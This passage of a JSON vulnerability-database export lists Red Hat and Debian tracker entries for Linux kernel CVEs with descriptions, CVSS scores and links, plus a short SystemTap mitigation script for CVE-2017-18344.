"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2020-04-08T18:59:56", "id": "RH:CVE-2016-10318", "href": "https://access.redhat.com/security/cve/cve-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-09-02T22:53:56", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-05T05:13:33", "type": "redhatcve", "title": "CVE-2014-9410", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2021-03-18T17:20:21", "id": "RH:CVE-2014-9410", "href": "https://access.redhat.com/security/cve/cve-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T11:11:38", "description": "The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-08T04:58:16", "type": "redhatcve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2022-07-07T09:25:24", "id": "RH:CVE-2017-18203", "href": "https://access.redhat.com/security/cve/cve-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-08T05:22:06", "description": "A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on a negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-14T19:02:39", "type": "redhatcve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2022-06-08T03:34:16", "id": "RH:CVE-2017-12192", "href": "https://access.redhat.com/security/cve/cve-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-07T11:11:22", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function.\n#### Mitigation\n\nAttached to this bugzilla is a systemtap script that will prevent opening (and therefore reading) the /proc/&lt;process&gt;/timers file which is used to leak information. \n\n\nThe SystemTap script is relatively small and efficient, broken into 3 distinct sections as follows: \n\n\n\\-------- \n\n\nprobe kernel.function(&quot;proc_timers_open@fs/proc/base.c&quot;).return { \n // this is -EACCES \n$return = -13; \n message = sprintf(&quot;CVE-2017-18344 mitigation denied access to %s to %s(%d)&quot;, file_name , execname(), pid()); \n // print a warning message at KERN_INFO debug level \n printk(6, message); \n} \n\n\nprobe begin { \n printk(6, &quot;Mitigation for CVE-2017-18344 loaded.\\n&quot;); \n} \n\n\nprobe end { \n printk(6, &quot;Mitigation for CVE-2017-18344 unloaded.\\n&quot;); \n} \n\n\n\\--------- \n\n\nFirst, the script places a probe at the return of the kernel function \u201cproc_timers_open\u201d when called. This modifies the return value to be EACCES which would return this value to userspace preventing this file from being opened. When the /proc/&lt;pid&gt;/timer file is attempted to be opened, a message will be logged to the kernel log subsystem showing the process and pid of the application attempting to access the timer file. \n\n\nThis file is not in widespread use at this time, although some applications may read from it to debug or understand their own timers that are set. This mitigation will not be useful in this context. \n\n\nFinally, the \u201cprobe begin\u201d and \u201cprobe end\u201d code blocks tell systemtap to add the supplied text to the kernel log buffer via the printk function. This creates an audit trail by registering in the system logs exactly when the mitigation is loaded and unloaded. This will need to be compiled with guru mode (-g parameter) to compile. \n\n\nThis will need to be loaded at each boot to remain effective. Red Hat Product security recommends updating to a patched kernel when it is available. \n\n\nRed Hat always seeks to provide both mitigations to disable attacks as well as the actual patches to treat the flaw. To learn more about SystemTap, and how it can be used in your management of your Red Hat systems, please refer to Using SystemTap[1] or one of our videos about it within our Customer Portal[2]. \n\n\n1 - <https://access.redhat.com/articles/17839> \n2 - <https://access.redhat.com/search/#/?q=systemtap> \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-01T17:49:05", "type": "redhatcve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2022-07-07T09:27:31", "id": "RH:CVE-2017-18344", "href": "https://access.redhat.com/security/cve/cve-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-05-31T14:36:03", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel before 4.7.4 allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T16:59:00", "type": "debiancve", "title": "CVE-2016-10318", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-04T16:59:00", "id": "DEBIANCVE:CVE-2016-10318", "href": "https://security-tracker.debian.org/tracker/CVE-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel before 3.19 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T21:59:00", "type": "debiancve", "title": "CVE-2014-9940", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-05-02T21:59:00", "id": "DEBIANCVE:CVE-2014-9940", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T06:10:38", "description": "Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-25T21:29:00", "type": "debiancve", "title": "CVE-2015-5327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2017-09-25T21:29:00", "id": "DEBIANCVE:CVE-2015-5327", "href": "https://security-tracker.debian.org/tracker/CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-05-31T14:36:03", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "debiancve", "title": "CVE-2016-4794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2016-05-23T10:59:00", "id": "DEBIANCVE:CVE-2016-4794", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.", "cvss3": {}, "published": "2015-01-02T21:59:00", "type": "debiancve", "title": "CVE-2014-9428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2015-01-02T21:59:00", "id": "DEBIANCVE:CVE-2014-9428", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux kernel through 3.18 uses an improper paravirt_enabled setting for KVM guest kernels, which makes it easier for guest OS users to bypass the ASLR protection mechanism via a crafted application that reads a 16-bit value.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-12T18:59:00", "type": "debiancve", "title": "CVE-2014-8134", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2014-12-12T18:59:00", "id": "DEBIANCVE:CVE-2014-8134", "href": "https://security-tracker.debian.org/tracker/CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-31T18:11:38", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allow local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T20:29:00", "type": "debiancve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-02-27T20:29:00", "id": "DEBIANCVE:CVE-2017-18203", "href": "https://security-tracker.debian.org/tracker/CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-31T14:36:03", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-12T00:29:00", "type": "debiancve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2017-10-12T00:29:00", "id": "DEBIANCVE:CVE-2017-12192", "href": "https://security-tracker.debian.org/tracker/CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T18:11:38", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T19:29:00", "type": "debiancve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-07-26T19:29:00", "id": "DEBIANCVE:CVE-2017-18344", "href": "https://security-tracker.debian.org/tracker/CVE-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T06:10:38", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.", "cvss3": {}, "published": "2015-08-31T10:59:00", "type": "debiancve", "title": "CVE-2015-5364", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-08-31T10:59:00", "id": "DEBIANCVE:CVE-2015-5364", "href": "https://security-tracker.debian.org/tracker/CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T14:36:03", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU.", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2016-2069", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2016-2069", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T06:10:38", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2015-8812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2015-8812", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T14:36:03", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "type": "debiancve", "title": "CVE-2016-0728", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-02-08T03:59:00", "id": "DEBIANCVE:CVE-2016-0728", "href": "https://security-tracker.debian.org/tracker/CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "debiancve", "title": "CVE-2014-3181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": 